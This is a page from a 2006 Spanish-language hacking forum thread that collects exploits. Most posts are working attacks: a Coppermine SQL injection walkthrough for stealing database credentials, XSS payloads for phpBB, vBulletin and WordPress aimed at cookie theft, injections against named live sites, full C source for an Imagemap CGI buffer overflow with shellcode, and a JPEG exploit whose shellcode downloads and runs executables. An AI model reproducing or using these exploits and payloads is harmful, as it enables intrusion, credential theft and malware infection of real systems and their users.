elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Recopilatorio de Exploits Interesantes (-Actualizando-)
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 2 [3] 4 5 6 Ir Abajo Respuesta Imprimir
Autor Tema: Recopilatorio de Exploits Interesantes (-Actualizando-)  (Leído 88,866 veces)
grx0

Desconectado Desconectado

Mensajes: 132


Ver Perfil
SHOUTcast <= 1.9.4 HTTP GET Filename Request Remote Format String Exploit
« Respuesta #28 en: 29 Enero 2006, 06:03 »

Hola gente, aqui posteo el nuevo exploit para que lo estudien y prueben. Yo lo he probado y en el 20% de los host teoricamente vulnerables (osea 1.9.4 Linux) funciono, el tema es que el shellcode solo hace un bind, esto quiere decir que espera una conexion remota al port 7000,  y algo a tener en cuenta es que los server importantes de Radio que usan Shoucast tienen firewall o estan en LANs , lo que impide o dificulta que el mismo espere una conexion, en otros casos vi que el port 7000 estaba filtrado, pero en port mas altos podria andar. La idea es modificar el exploit de forma que haga un bind reverso. Esto solucionaria el problema.. Por lo que use un shellcode de Metasploit y no tube mucho exito, aver si alguien me ayuda un poco.


Exploit:

http://www.frsirt.com/exploits/20060128.shoutcast_expl.c.php

Salu2
En línea

ZerO_HacK

Desconectado Desconectado

Mensajes: 1


Ver Perfil
Bug en ArchivosP?.???
« Respuesta #29 en: 7 Febrero 2006, 19:52 »

Hola, este no es un xploit ni nada parecido, es una web que encontre y como estamos repletos de informaticos que no saben manejar los chmod... hemm.. dense cuenta ustedes mismos.
Esta es la web, busquen un archivo.
http://www.archivosp?.???/

Luego una vez que presionaron bajar archivo, te tira a una web donde debes introducir el codigo enviando un mensaje..
Es ahí donde vas a esta web:
http://www.downloads.archivosp?.???/bajar/prueba12390.php
Y simple.. Presionas el link que dice "Enviar SMS" y te dara un codigo similar a este 4AC7784.
luego vas a la web, introduces el codigo y listo.
ves que facil..

Ya suerte y luego les muestro otra cosita que encontre!.

Saludos

ZerO_HacK

***EDITADO***--Sirdarckcat--
perdon no podemos dar información de terceros, lo edite un poco..

Saludos!!
« Última modificación: 8 Febrero 2006, 01:47 por Sirdarckcat » En línea

s0cratex

Desconectado Desconectado

Mensajes: 27


Ver Perfil
Xploiting "Coppermine photo gallery"
« Respuesta #30 en: 13 Febrero 2006, 19:19 »

----------------------
CPG 1.3.1 Y 1.3.2
......................
File Retrieval con SQL Injection x Cookie poisong
Primero les digo que esto no es un texto serio. Es solo un post y se basa en que a muxa gemte se le complica la compilacion de el exploit (supongo esta anti-kiddie.. o algo asi)
Bien.. Lo primero que haremos será bajarnos el IECV --> IE Cookie Viewer. http://www.zone-h.org/download/file=3270/
Luego acceder ('desde internet explorer') a la galería y nos dejará una cookie con esta forma:
cpg131_data  :  YToyOntzOjI6IklEIjtzOjMyOiI0YTM0MGExNzJmMDUyNGEyOGEzOTMzZDhkYTZjMTA4MiI7czoyOiJhbSI7aToxO30=
----------------------------------------------------------------------------------------------------
Bien ahora damos click derecho sobre la cookie y le damos "edit the content of cookie"
y cambiamos los valores por

cpg131_fav  :  YToxOntpOjA7czo1MToiJycpIFVOSU9OIFNFTEVDVCAnLi4vaW5jbHVkZS8nLCAnY29uZmlnLmluYy5waHAnIC8qIjt9
----------------------------------------------------------------------------------------------------
Y le damos open web site...
Ahora nos vamos a la direccion de la galería y accesamos a zipdownload.php
http://www.sitio.com/gallery/zipdownload.php
y se nos descargara el archivo pictures.zip con el archivo "" config.inc.php ""
dentro.
Por que??
Si se fijan la cookie está en 64 bits. La cual en castellano significa esto:
a:1:{i:0;s:51:"'') UNION SELECT '../include/', 'config.inc.php' /*";}
de hecho el mismo exploit dice que para obtener otro archivo cambiemos los valores de los archivos y los encriptemos con el siguiente script en php:
<?
$tab[]=$_GET['inj'];
$val=base64_encode(serialize($tab));
echo $val;
?>
--------------------------------------------------------------------------

ahora que tengamos el config.inc.php tendra un contenido asi:
<?php
// Coppermine configuration file

// MySQL configuration
$CONFIG['dbserver'] =                      "localhost";        // Your database server
$CONFIG['dbuser'] =                         "superadmin";        // Your mysql username
$CONFIG['dbpass'] =                         "superpass";                // Your mysql password
$CONFIG['dbname'] =                        "superdb";        // Your mysql database name


// MySQL TABLE NAMES PREFIX
$CONFIG['TABLE_PREFIX'] =                "cpg131_";
?>

esto es equivalente por ejemplo a los config.php de el phpbb.
Si es hosting pueden entrar por el phpmyadmin si no busquen el puerto 3306 abierto e intente conectarse...
y por que no tb intenten en el FTP o el mail de el administrador.

-----------------------------------------
Salu2
s0cr@t3x
« Última modificación: 13 Febrero 2006, 19:22 por S0cr@t3X » En línea

------------------------------------
.:[| s0cratex security crazy |]:.
------------------------------------
MrX0nX1

Desconectado Desconectado

Mensajes: 76



Ver Perfil
Exploits para las vulnerabilidades de Febrero [noticia (3 dias, recopilatorio)]
« Respuesta #31 en: 18 Febrero 2006, 20:15 »

Exploits para las vulnerabilidades de Febrero

Como todos los meses, después de publicarse los parches de Microsoft, comienzan a aparecer los exploits correspondientes a esos parches.
Por ahora ya son cuatro los publicados dos de ellos para el MS06-006 y dos para el MS06-005.
Estos son los parches tal y como los han denominado en FrSIRT :

Exploit para el plugin del WMP 10 que funciona en sistemas que estén utilizando el Mozilla Firefox.
Según el source ha sido testeado con Firefox 1.5.0.1/Windows Media Player 10/Windows XP SP2 (US)
Una vez ejecutado crea en el sistema de la víctima una cuenta de administrador con el User: wmp0wn3d y Password: password

Exploit, para ser utilizado desde el Metasploit, para el plugin del WMP 9 que funciona en sistemas que estén utilizando el Mozilla Firefox u Opera.

Overflow mediante un archivo bmp

Lo mismo que el anterior, aunque de una manera un poco diferente.
Afecta al Microsoft Windows Media Player 7.1 hasta el 10
Crea un archivo llamado "crafted.bmp" que se ha de guardar en un archivo con extensión .asx que contenga este código (o similar):
Código:
<ASX version="3.0">
<ENTRY>
<TITLE>Windows Media Player BMP Heap Overflow (MS06-005)</TITLE>
<REF HREF="crafted.bmp"/>
<DURATION VALUE="60:00"/>
</ENTRY>
</ASX>


Origen: www.frsirt.com
Fuente: http://cyruxnet.org/archivo.php?20060118.00


S4lu2
« Última modificación: 19 Febrero 2006, 02:42 por Sirdarckcat » En línea

blackmarux

Desconectado Desconectado

Mensajes: 14



Ver Perfil
Fallo en phpBB (Cross Site Scripting)
« Respuesta #32 en: 21 Febrero 2006, 07:25 »

Citar
################################################

Advisory Name:New phpBB ViewTopic.php Cross Site Scripting Vulnerability

Release Date: Feb 29,2004

Application: phpBB

Platform: PHP

Version Affected: the lastest version

Vendor URL: http://www.phpbb.com/

Discover: Cheng Peng Su(apple_soup_at_msn.com)

################################################

Details:

This vuln is similar to Arab VieruZ's advisory 'XSS bug in phpBB',this time the problem is not in 'highlight' ,but in 'postorder'.we can inject HTML code,such code could be used to steal cookie information.

Proof of Concept:

If there is a topic at

http://site/phpBB/viewtopic.php?t=123456

this page can be also viewed at

http://site/phpBB/viewtopic.php?t=123456&postorder=asc

then this page will contain code like below:

<a class="maintitle" href="viewtopic.php?t=176994&start=0&postdays=0&postorder=as
c&highlight=">[Topic Title]</a>.

phpBB doesn't filter out illegal characters from 'postorder',so we can inject HTML code after 'postorder='.

Exploit:

URL: http://site/phpBB/viewtopic.php?t=123456&postorder=%22%3E%3C%73%63%72%69
%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65
%29%3C%2F%73%63%72%69%70%74%3E%3C

note unescape('=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%
6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C') == '"><script>alert(document.cookie)</script><'

Contact:

Cheng Peng Su

apple_soup_at_msn.com

Class 1,Senior 2,High school attached to Wuhan University

Wuhan,Hubei,China

La cadena &postorder=%22%3E%3C ... %70%74%3E%3C equivale a &postorder='">&lt;script&gt;alert(document.cookie)&lt;/script&gt;<'

que se puede hacer con eso... supongo que permitira ejecutar algun codigo malicioso, espero que a alguien le sirva.
En línea

-----black marux------ grrrr
-sagitari-


Desconectado Desconectado

Mensajes: 1.639


:D


Ver Perfil WWW
vBulletin 3.0.12-3.5.3 [XSS]
« Respuesta #33 en: 24 Febrero 2006, 15:47 »

Código:
oftware: vBulletin
Vendor: http://www.vbulletin.com/
Versions: 3.0.12-3.5.3
Class: Remote
Status: Unpatched
Exploit: Available
Solution: Available
Discovered by: imei addmimistrator
Risk Level: Medium

-------Description-------
There is a security bug in most powerfull & common forum software vBulletin version 3.0.12&3.5.3 that allows attacker performe a XSS attack.
<!--more--> bug is in result of unsentizing quotation and < & > characters for "email" field of users' information. a weak regular expression for validation email that allows insertiong unvalid characters in domain-name section of email is source of this bug and also forgot to htmlspeacialcharing output value in sendmsg.php file, helps exploiting this bug. a successfull attack can result to thefthing cookies, hijacking pages and etc...

-------Conditions-------
AdminSetting Should meeted these settings:
Enable Email features=Yes
Allow Users to Email Other Members=Yes
Use Secure Email Sending=No
forum/admins/options.php?do=options&dogroup=email
It sounds that conditions are defaultly OK;

-------Exploit-------
Scenario:
/forum/profile.php?do=editpassword
pass:your pass
email: imei@myimei.com”><script>alert(1)</script>.nomatt
Note About lenght limitation
****
forum/profile.php?do=editoptions
Receive Email from Other Members=yes
****
forum/sendmessage.php?do=mailmember&u={your id}

-------Solution-------
Upgrade to vendore provided patch.
En línea

043h68

Desconectado Desconectado

Mensajes: 169


tururu....♫


Ver Perfil WWW
Wordpress 2.0.0 y 2.0.1 XSS
« Respuesta #34 en: 4 Marzo 2006, 06:22 »

Bueno, ya que esta de moda que todo mundo tiene un blog y la mayoria tiene un bonito wordpress aqui estan ejemplos de inyecciones html para paquetes wordpress descubiertas recientemente (el día de hoy la última
(3. marzo.006)).

versión vulnerable 2.0.0
Citar
<strong>author's website</strong>:
<strong>" onfocus="alert(1)" onblur="alert(1)</strong>

referencia: addmimistrator

version vulnerable 2.0.1
Citar
- <script>alert(document.cookie)</script>
- <script>alert(String.fromCharCode(80,111,67,32,111,102,32,87,111,114,
100,80,114,101,115,115,32,98,121,32,75,52,80,48,32,102,114,111,109,32,
78,83,84))</script>
- <script src=http://www.example.com></script>
- <script>document.location = String.fromCharCode(104,116,116,112,58,47,
47,119,119,119,46,110,101,111,115,101,99,117,114,105,116,121,116,101,
97,109,46,110,101,116)</script>

referencia: K4P0 (3 de marzo 2006 ;))
///////////////////////////////////
« Última modificación: 9 Marzo 2006, 03:47 por 043h68 » En línea

CdbRwS

Desconectado Desconectado

Mensajes: 183


[ Made In San Luis ]


Ver Perfil
[°] fotolog.terra.com.ar XSS ( - Reportado - )
« Respuesta #35 en: 6 Marzo 2006, 16:49 »

Vulnerability in fotolog.terra.com.ar and fotolog.terra.cl of Cross-Site Scripting (XXS), HTML, injection, discovered single by my cdbrws, for days but grapichs

Vulnerabilidad en fotolog.terra.com.ar y fotolog.terra.cl vulnerabilidad en XXS - se pueden hacer HTML Iny, Esto hace un tiempo largo lo descubri lo kise notificar a terra y no me dieron bolilla asi que bueno aka esta..


una vez que entren al panel de control del fotolog vayan a favoritos




Luego sigan por aka







En el codigo si uds meten un <script>alert()</script> por ej, cuando uds entren otra vez al panel de administracion les va a saltar el alert() pero si uds van al fotolog de uds y el que ven todos, no sale.. entonces agarren y metan

<script>alert("")</script><script>alert("")</script</table><div id=Layer1 style=position:absolute; left:0px; top:0px; width:1000px; height:800px; z-index:1><iframe src=http://www.web.com width=%100 height=%100><script>alert("Flog De CdbRwS")</script>

</table><div id=Layer1 style=position:absolute; left:0px; top:0px; width:1000px; height:800px; z-index:1><iframe src=http://www.juaking-fox.net/cdbrws/ width=%100 height=%100>

por que uds con el primero codigo hacen provocar un error en el flog, y el code que sigue si va a funcionar.. en el caso que no funcione, creen un flog.html y subanlo a su web por ej, que adentro de ese code html tenga algun codigo de alert, de robar cookies, de cualkier cosa entonces agarren  y  aka



pongan esto </table><div id=Layer1 style=position:absolute; left:0px; top:0px; width:1000px; height:800px; z-index:1><iframe src=http://www.suweb.com/flog.html width=%100 height=%100>

entonces aparece un frame con la pagina que crearon y ahi si van andar todos los codigos que metieron..

By CdbRwS

Para Hacer Flood en los comentarios, no es nada del otro mundo agarren escriban su nombre, y el mensaje y pongan enviar comentarios pongan el codigo de confirmacion pongalo bien y aprieten dos veces seguidas rapido en Enviar entonces les va a decir que esta mal ponganlo de nuevo bien pero aprieten rapido dos veces en Enviar, Entonces si uds despues ponen bien el codigo van a ver que ya postearon 3 veces el mismo post, es mas facil que andar copiando el mje pegando y enviando de nuevo xD.. saludos..






« Última modificación: 13 Marzo 2006, 00:53 por CdbRwS » En línea


[ C d b R w S ]
kaskote

Desconectado Desconectado

Mensajes: 6


Ver Perfil
Imagemap CGI Exploit
« Respuesta #36 en: 9 Marzo 2006, 19:17 »

necesito que me digan si pueden compilar este exploit que tengo un servidor vulnerable pero no me compila bajo gcc, devcpp, borland, nada.. no me doy cuenta porke... grax, (si lo compilan y lo cuelgan de algun lado para que lo baje mejor y sino diganme que esta mal en el codigo que no logro darme cuenta)
Código:
/*=============================================================================
   Imagemap 1.00.00 CGI Exploit (Distributed with OmniHTTPd 1.01 and Pro2.04)
   The Shadow Penguin Security (http://shadowpenguin.backsection.net)
   Written by UNYUN (shadowpenguin@backsection.net)
  =============================================================================
*/
#include    <stdio.h>
#include    <string.h>
#include    <windows.h>
#include    <winsock.h>

#define     MAXBUF          2000
#define     RETADR          348
#define     JMPADR          344
#define     HTTP_PORT       80

unsigned int mems[]={
0xBFB50000, 0xBFB72FFF,  0xBFDE0000, 0xBFDE5FFF,
0xBFE00000, 0xBFE0FFFF,  0xBFE30000, 0xBFE42FFF,
0xBFE80000, 0xBFE85FFF,  0xBFE90000, 0xBFE95FFF,
0xBFEA0000, 0xBFF1EFFF,  0xBFF20000, 0xBFF46FFF,
0xBFF50000, 0xBFF60FFF,  0xBFF70000, 0xBFFC5FFF,
0xBFFC9000, 0xBFFE2FFF,
0,0};

unsigned char exploit_code[200]={
0xEB,0x32,0x5B,0x53,0x32,0xE4,0x83,0xC3,
0x0B,0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7,
0xBF,0xFF,0xD0,0x43,0x53,0x50,0x32,0xE4,
0x83,0xC3,0x06,0x88,0x23,0xB8,0x28,0x6E,
0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x43,0x53,
0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,
0xD6,0x90,0xEB,0xFD,0xE8,0xC9,0xFF,0xFF,
0xFF,0x00
};

unsigned char cmdbuf[200]="msvcrt.dll.system.welcome.exe";

unsigned int search_mem(unsigned char *st,unsigned char *ed,
                unsigned char c1,unsigned char c2)
{
    unsigned char   *p;
    unsigned int    adr;

    for (p=st;p<ed;p++)
        if (*p==c1 && *(p+1)==c2){
            adr=(unsigned int)p;
            if ((adr&0xff)==0) continue;
            if (((adr>>8)&0xff)==0) continue;
            if (((adr>>16)&0xff)==0) continue;
            if (((adr>>24)&0xff)==0) continue;
            return(adr);
        }
    return(0);
}

main(int argc,char *argv[])
{
    SOCKET               sock;
    SOCKADDR_IN          addr;
    WSADATA              wsa;
    WORD                 wVersionRequested;
    unsigned int         i,ip,p1,p2;
    static unsigned char buf[MAXBUF],packetbuf[MAXBUF+1000];
    struct hostent       *hs;

    if (argc<2){
        printf("usage: %s VictimHost\n",argv[0]); return -1;
    }
    wVersionRequested = MAKEWORD( 2, 0 );
    if (WSAStartup(wVersionRequested , &wsa)!=0){
        printf("Winsock Initialization failed.\n"); return -1;
    }
    if ((sock=socket(AF_INET,SOCK_STREAM,0))==INVALID_SOCKET){
        printf("Can not create socket.\n"); return -1;
    }
    addr.sin_family     = AF_INET;
    addr.sin_port       = htons((u_short)HTTP_PORT);
    if ((addr.sin_addr.s_addr=inet_addr(argv[1]))==-1){
            if ((hs=gethostbyname(argv[1]))==NULL){
                printf("Can not resolve specified host.\n"); return -1;
            }
            addr.sin_family = hs->h_addrtype;
            memcpy((void *)&addr.sin_addr.s_addr,hs->h_addr,hs->h_length);
    }
    if (connect(sock,(LPSOCKADDR)&addr,sizeof(addr))==SOCKET_ERROR){
        printf("Can not connect to specified host.\n"); return -1;
    }
    memset(buf,0x90,MAXBUF); buf[MAXBUF]=0;
    for (i=0;;i+=2){
        if (mems[i]==0) return FALSE;
        if ((ip=search_mem((unsigned char *)mems[i],
            (unsigned char *)mems[i+1],0xff,0xe3))!=0) break;
    }
    buf[RETADR  ]=ip&0xff;
    buf[RETADR+1]=(ip>>8)&0xff;
    buf[RETADR+2]=(ip>>16)&0xff;
    buf[RETADR+3]=(ip>>24)&0xff;
    buf[JMPADR  ]=0xeb;
    buf[JMPADR+1]=0x06;

    strcat(exploit_code,cmdbuf);
    p1=(unsigned int)LoadLibrary;
    p2=(unsigned int)GetProcAddress;
    exploit_code[0x0d]=p1&0xff;
    exploit_code[0x0e]=(p1>>8)&0xff;
    exploit_code[0x0f]=(p1>>16)&0xff;
    exploit_code[0x10]=(p1>>24)&0xff;
    exploit_code[0x1e]=p2&0xff;
    exploit_code[0x1f]=(p2>>8)&0xff;
    exploit_code[0x20]=(p2>>16)&0xff;
    exploit_code[0x21]=(p2>>24)&0xff;

    memcpy(buf+RETADR+4,exploit_code,strlen(exploit_code));
    sprintf(packetbuf,"GET /cgi-bin/imagemap.exe?%s\r\n\r\n",buf);
    send(sock,packetbuf,strlen(packetbuf),0);
    closesocket(sock);
    printf("Done.\n");
    return FALSE;
}
« Última modificación: 9 Marzo 2006, 23:48 por SirDarckCat » En línea

NIrV_09

Desconectado Desconectado

Mensajes: 1


Ver Perfil
Error en McAfee no eliminaba virus sino archivos
« Respuesta #37 en: 19 Marzo 2006, 20:12 »

Que incompetencia por parte de la gente de McAfee de no haber probado sus actualizaciones (o eso es lo que deja pensar ya que si hubiese sido lo contrario no las habrían publicado)
Por suerte a mi no me toco, perp a la hora de descargar las actualizaciones las miro dos veces.
Es indispensable estar al día con esta cuestiones pero quien sabe a estas alturas. El artículo comlpeto lo encontré en http://www.spyware-war.com/bugs-errores/un-error-en-mcafee-no-eliminaba-virus-sino-archivos-importantes.html para quienes quieran saber mas de lo que estoy hablando.
me gustaria que algun usuario de McAfee que haya tenido una experiencia por esta falla se ponga ne contacto
Hasta pronto
En línea

pagvac

Desconectado Desconectado

Mensajes: 12



Ver Perfil WWW
XSS bug en "registro de nicks" de www.irc-hispano.org
« Respuesta #38 en: 11 Abril 2006, 01:10 »

El siguiente XSS *no* parece ser muy explotable (por eso no me molesté en contactar el webmaster) pero me pareció un ejemplo interesante de XSS.

Es posible causar el script encargado de los registros de nicks (regnick.cgi) devolver código inyectado en el campo "nick" de vuelta al navegador web al intentar registrar un nick que *ya existe*. Este bug *sólo* funciona cuando el nick elegido *ya* haya sido registrado previamente. Ésto *no* supone un problema ya que podemos elegir el nick de un bot que sepamos que ya existe con certeza ("nick" por ejemplo).

La razón por la que no parece ser muy explotable es porque el campo "nick" sólo toma un número de caracteres *muy* reducido que  ni siquiera parece ser suficiente para incluir un javascript malicioso desde un sitio tercero ("<script src="http://a.com/a.js")

La siguiente URL parece funcionar en Internet Explorer:

Código:
http://www.irc-hispano.org/cgi-bin/regnick.cgi?nick=nick%20<script>alert('x')</script>&mail=a

Nota: versiones recientes de Firefox tienen funciones anti-XSS, así que puede que la URL previa *no* ejecute el javascript si es abierta con Firefox.



Detalles:

Al elegir un nick que ya ha sido registrado, "regnick.cgi" muestra un error y propone 6 nicks similares para escoger. Es exactamente en esas 6 sugerencias donde el código inyectado es devuelto al navegador (por eso la ventana de alerta la la URL anterior se ejecuta 6 veces):

Código:
    <li>El nick que has escogido  ya está registrado.. <br>
        <li>Si quieres, puedes escoger uno de estos nicks:<br>
          nick <script>alert('x'), |nick <script>alert('x')|, {nick <script>alert('x')}, _nick <script>alert('x')_, ^nick <script>alert('x')^, nick <script>alert('x')^^

Sería interesante si alguien encuentra una forma de sobrepasar el limite de caracteres aceptados por el campo "nick" para poder inyectar código *sin* ningún tipo de restricciones.
En línea

De@th
TROLL

Desconectado Desconectado

Mensajes: 169


Ver Perfil
Re: <-> Recopilatorio de Exploits Interesantes (-Actualizando-)
« Respuesta #39 en: 14 Abril 2006, 20:54 »

Aqui Dejo El Còdigo Del  Exploit Que Permite Descargar Ejecutables DeUn Server y ejecutarlos desde un archivo jpg
me explico : al abrir  una foto (ej: foto.jpg ) se ejecuta un codigo:
se los dejo :
Código:

#include <windows.h>
#include <stdio.h>

/*
codigo de shell generico de win32
puedes poner 2500 bytes de codigo de shell
pero no puede contener 0xFFh 0xD9
por que es el marcador de donde termina el jpg
diviertanse !!
*/
char shellcode[]=
"\xEB\x0F\x58\x80\x30\x17\x40\x81\x38\x6D\x30\x30\x21\x75\xF4"
"\xEB\x05\xE8\xEC\xFF\xFF\xFF\xFE\x94\x16\x17\x17\x4A\x42\x26"
"\xCC\x73\x9C\x14\x57\x84\x9C\x54\xE8\x57\x62\xEE\x9C\x44\x14"
"\x71\x26\xC5\x71\xAF\x17\x07\x71\x96\x2D\x5A\x4D\x63\x10\x3E"
"\xD5\xFE\xE5\xE8\xE8\xE8\x9E\xC4\x9C\x6D\x2B\x16\xC0\x14\x48"
"\x6F\x9C\x5C\x0F\x9C\x64\x37\x9C\x6C\x33\x16\xC1\x16\xC0\xEB"
"\xBA\x16\xC7\x81\x90\xEA\x46\x26\xDE\x97\xD6\x18\xE4\xB1\x65"
"\x1D\x81\x4E\x90\xEA\x63\x05\x50\x50\xF5\xF1\xA9\x18\x17\x17"
"\x17\x3E\xD9\x3E\xE0\xFE\xFF\xE8\xE8\xE8\x26\xD7\x71\x9C\x10"
"\xD6\xF7\x15\x9C\x64\x0B\x16\xC1\x16\xD1\xBA\x16\xC7\x9E\xD1"
"\x9E\xC0\x4A\x9A\x92\xB7\x17\x17\x17\x57\x97\x2F\x16\x62\xED"
"\xD1\x17\x17\x9A\x92\x0B\x17\x17\x17\x47\x40\xE8\xC1\x7F\x13"
"\x17\x17\x17\x7F\x17\x07\x17\x17\x7F\x68\x81\x8F\x17\x7F\x17"
"\x17\x17\x17\xE8\xC7\x9E\x92\x9A\x17\x17\x17\x9A\x92\x18\x17"
"\x17\x17\x47\x40\xE8\xC1\x40\x9A\x9A\x42\x17\x17\x17\x46\xE8"
"\xC7\x9E\xD0\x9A\x92\x4A\x17\x17\x17\x47\x40\xE8\xC1\x26\xDE"
"\x46\x46\x46\x46\x46\xE8\xC7\x9E\xD4\x9A\x92\x7C\x17\x17\x17"
"\x47\x40\xE8\xC1\x26\xDE\x46\x46\x46\x46\x9A\x82\xB6\x17\x17"
"\x17\x45\x44\xE8\xC7\x9E\xD4\x9A\x92\x6B\x17\x17\x17\x47\x40"
"\xE8\xC1\x9A\x9A\x86\x17\x17\x17\x46\x7F\x68\x81\x8F\x17\xE8"
"\xA2\x9A\x17\x17\x17\x44\xE8\xC7\x48\x9A\x92\x3E\x17\x17\x17"
"\x47\x40\xE8\xC1\x7F\x17\x17\x17\x17\x9A\x8A\x82\x17\x17\x17"
"\x44\xE8\xC7\x9E\xD4\x9A\x92\x26\x17\x17\x17\x47\x40\xE8\xC1"
"\xE8\xA2\x86\x17\x17\x17\xE8\xA2\x9A\x17\x17\x17\x44\xE8\xC7"
"\x9A\x92\x2E\x17\x17\x17\x47\x40\xE8\xC1\x44\xE8\xC7\x9A\x92"
"\x56\x17\x17\x17\x47\x40\xE8\xC1\x7F\x12\x17\x17\x17\x9A\x9A"
"\x82\x17\x17\x17\x46\xE8\xC7\x9A\x92\x5E\x17\x17\x17\x47\x40"
"\xE8\xC1\x7F\x17\x17\x17\x17\xE8\xC7\xFF\x6F\xE9\xE8\xE8\x50"
"\x72\x63\x47\x65\x78\x74\x56\x73\x73\x65\x72\x64\x64\x17\x5B"
"\x78\x76\x73\x5B\x7E\x75\x65\x76\x65\x6E\x56\x17\x41\x7E\x65"
"\x63\x62\x76\x7B\x56\x7B\x7B\x78\x74\x17\x48\x7B\x74\x65\x72"
"\x76\x63\x17\x48\x7B\x60\x65\x7E\x63\x72\x17\x48\x7B\x74\x7B"
"\x78\x64\x72\x17\x40\x7E\x79\x52\x6F\x72\x74\x17\x52\x6F\x7E"
"\x63\x47\x65\x78\x74\x72\x64\x64\x17\x40\x7E\x79\x5E\x79\x72"
"\x63\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x58\x67\x72\x79\x56"
"\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x58\x67\x72\x79\x42\x65"
"\x7B\x56\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x45\x72\x76\x73"
"\x51\x7E\x7B\x72\x17\x17\x17\x17\x17\x17\x17\x17\x17\x7A\x27"
"\x27\x39\x72\x6F\x72\x17"
"m00!";
/*0xFF 0xFE 0x00 0x01*/
char header1[]=
"\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x02\x00\x00\x64"
"\x00\x64\x00\x00\xFF\xEC\x00\x11\x44\x75\x63\x6B\x79\x00\x01\x00"
"\x04\x00\x00\x00\x0A\x00\x00\xFF\xEE\x00\x0E\x41\x64\x6F\x62\x65"
"\x00\x64\xC0\x00\x00\x00\x01\xFF\xFE\x00\x01\x00\x14\x10\x10\x19"
"\x12\x19\x27\x17\x17\x27\x32\xEB\x0F\x26\x32\xDC\xB1\xE7\x70\x26"
"\x2E\x3E\x35\x35\x35\x35\x35\x3E";

char setNOPs1[]=
"\xE8\x00\x00\x00\x00\x5B\x8D\x8B"
"\x00\x05\x00\x00\x83\xC3\x12\xC6\x03\x90\x43\x3B\xD9\x75\xF8";

char setNOPs2[]=
"\x3E\xE8\x00\x00\x00\x00\x5B\x8D\x8B"
"\x2F\x00\x00\x00\x83\xC3\x12\xC6\x03\x90\x43\x3B\xD9\x75\xF8";

/*La Imagen Aquì*/
char header2[]=
"\x44"
"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x01\x15\x19\x19"
"\x20\x1C\x20\x26\x18\x18\x26\x36\x26\x20\x26\x36\x44\x36\x2B\x2B"
"\x36\x44\x44\x44\x42\x35\x42\x44\x44\x44\x44\x44\x44\x44\x44\x44"
"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44"
"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\xFF\xC0\x00"
"\x11\x08\x03\x59\x02\x2B\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01"
"\xFF\xC4\x00\xA2\x00\x00\x02\x03\x01\x01\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x03\x04\x01\x02\x05\x00\x06\x01\x01\x01\x01"
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x02"
"\x03\x10\x00\x02\x01\x02\x04\x05\x02\x03\x06\x04\x05\x02\x06\x01"
"\x05\x01\x01\x02\x03\x00\x11\x21\x31\x12\x04\x41\x51\x22\x13\x05"
"\x61\x32\x71\x81\x42\x91\xA1\xC1\x52\x23\x14\xB1\xD1\x62\x15\xF0"
"\xE1\x72\x33\x06\x82\x24\xF1\x92\x43\x53\x34\x16\xA2\xD2\x63\x83"
"\x44\x54\x25\x11\x00\x02\x01\x03\x02\x04\x03\x08\x03\x00\x02\x03"
"\x01\x00\x00\x00\x00\x01\x11\x21\x31\x02\x41\x12\xF0\x51\x61\x71"
"\x81\x91\xA1\xB1\xD1\xE1\xF1\x22\x32\x42\x52\xC1\x62\x13\x72\x92"
"\xD2\x03\x23\x82\xFF\xDA\x00\x0C\x03\x01\x00\x02\x11\x03\x11\x00"
"\x3F\x00\x0F\x90\xFF\x00\xBC\xDA\xB3\x36\x12\xC3\xD4\xAD\xC6\xDC"
"\x45\x2F\xB2\x97\xB8\x9D\xCB\x63\xFD\x26\xD4\xC6\xD7\x70\xA4\x19"
"\x24\x50\xCA\x46\x2B\xFC\xEB\x3B\xC7\xC9\xA5\x4A\x8F\x69\x26\xDF"
"\x6D\x72\x4A\x9E\x27\x6B\x3E\xE6\x92\x86\x24\x85\x04\xDB\xED\xA9"
"\x64\x8E\x6B\x63\x67\x19\x1A\xA5\xE7\xB8\x28\x3D\x09\xAB\x5D\x5F"
"\x16\xF7\x8C\xED\x49\x4C\xF5\x01\xE6\xE5\xD5\x1C\x49\xAB\x10\x71"
"\xA6\x36\x9B\x93\x24\x61\x00\x0F\x61\xEC\x34\xA7\x9C\x23\xF4\x96"
"\xC6\xE6\xAF\xB7\x80\x76\xEF\x93\xF0\xAA\x28\x8A\x6B\xE0\x18\xC0"
"\xA4\x9B\x7E\x90\x39\x03\xC2\x90\xDC\x43\x31\x91\x62\x91\x86\x23"
"\x35\x35\xA2\x80\x4D\xFA\x72\x31\x07\x9D\x03\x70\xA8\x93\x24\x4F"
"\x89\x51\x83\x5E\xA4\x2E\x7A\xC0\x7D\xA9\x8A\x10\x61\x64\x07\xFA"
"\x88\xC6\x89\x26\xDA\x0F\x20\xBD\xB9\x16\xD2\xA8\xE8\x91\x3F\x1A"
"\xE2\xBA\xF0\xBE\x74\xAB\x1D\xC4\x44\x15\x1A\x8A\x9C\xC7\x2A\x6B"
"\xA3\x33\xB7\x1E\x88\x47\x69\xA9\x64\x68\x26\xC1\x97\x0B\xD6\x86"
"\x8B\x1B\x29\xC6\x87\xE4\xC7\xFD\xCC\x53\x11\xA5\x9C\x62\x6A\xE5"
"\x40\x37\x61\x89\xF6\xB2\x9C\x2A\x7C\xFD\x05\x6A\x30\x5F\x52\x02"
